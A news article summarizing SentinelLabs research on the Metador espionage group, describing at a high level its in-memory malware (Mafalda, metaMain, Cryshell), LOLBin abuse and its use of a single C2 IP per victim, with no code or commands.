Security firm, Sentinel Labs, has discovered a new threat group that is intent on targeting telecommunications, internet service providers (ISP), and universities, primarily in Africa and the Middle East. Based on a report published the advanced threat group has been active for two years and focuses on long-term persistence for cyber espionage.
The group was discovered somewhat accidentally following an analysis of a telecommunication company’s network based in the Middle East, which had already suffered intrusions from advanced threat groups MuddyWater and Moshen Dragon, Iranian and Chinese state-sponsored groups respectively.
Metador activity was uncovered when researchers noticed an unusual LOLBin that proved to be the root of an intricate infection chain that would yield two in-memory malware platforms and indications of additional Linux implants.
A LOLBin, or Living Off the Land Binaries, were initially non-malicious binaries that were later turned malicious when hackers figured they could be used to hide malicious activity.
They are typically used by hackers to gain persistence or escalate privileges, however, more recently local system binaries, preinstalled tools for easier use of an operating system, are used to bypass detection and aid in malware delivery.
The abuse then of LOLBin tactics by Metador, given the group's focus on persistence and remaining undetected for extended periods, is no surprise. While it may be no surprise it shows the group to be highly skilled and should be considered a threat.
Metador has also been seen to drop Windows-based malware going by the name Mafalda, which is capable of operating solely from memory. Along with Mafalda, researchers detected an unknown Linux malware and a custom implant called Cryshell.
The custom implant is used for bouncing connections in an internal network to external command-and-control servers, with support for custom port knocking sequences.
As for other tactics employed by the threat group, researchers noted that,
“Part of the difficulty in tracking the breadth of Metador’s operations involves their strict adherence to infrastructure segmentation. The attackers use a single IP per victim and build…Attributing Metador remains a garbled mystery. We encountered multiple languages, with diverse idiosyncrasies indicative of multiple developers. There are indications of a separation between developers and operators, and despite a lack of samples, the version history for at least one of the platforms suggests a history of development that extends far beyond the intrusions we’ve uncovered.”
Complex Attack Pattern
In providing a broad technical overview of Metador attack tactics, researchers noted that at the time of publishing their report and related blog article the original attack vector used could not be determined.
This is primarily down to the fact that the company’s infrastructure had been infected long before Sentinel One was charged with protecting it. However, it was discovered that Metador operators can choose between multiple execution flows to load anyone of the group's modular malicious frameworks.
Researchers saw the attackers deploy a backdoor called metaMain to decrypt Mafalda into memory. metaMain itself is implanted in memory, further complicating any kind of detection. Regarding Mafalda researchers stated,
“Mafalda is a flexible interactive implant, supporting over 60 commands. It appears to be a highly-valuable asset to the Metador operators, with newer variants exhibiting intense obfuscation making them challenging to analyze.”
As for Mafalda’s commands, they have used credential theft, data and information theft, command execution, system registry, and file system manipulation, and reconfigured the malware if needed.
As previously mentioned, Matador attacks use a single external IP address per victim network. The IP address is leveraged for command-and-control purposes via either HTTP or TCP protocols.
The servers were all hosted on a Dutch hosting provider, LITESERVER. Researchers also discovered some of the infrastructure hosted on SSH through an unusual port, with researchers believing that this was done to tunnel traffic through specific Mafalda’s internal commands.
Given all the information that has been released to the public, it is little wonder Sentinel One has highlighted the difficulties in attributing Metador attacks.
What can be determined is that the threat group's primary activity is espionage and the group's skillset lies in securing and maintaining persistence on the target infrastructure.
Researchers further noted that internal documentation suggests the implant is maintained and developed by a dedicated team, leaving comments for a separate group of operators.
Sentinel One concluded that,
“Running into Metador is a daunting reminder that a different class of threat actors continues to operate in the shadows with impunity. Previous threat intelligence discoveries have broadened our understanding of the kind of threats that are out there but so far, our collective ability to track these actors remains inconsistent at best. Developers of security products in particular should take this as an opportunity to proactively engineer their solutions towards monitoring for the most cunning, well-resourced threat actors. High-end threat actors are thriving in a market that primarily rewards compliance and perfunctory detections.”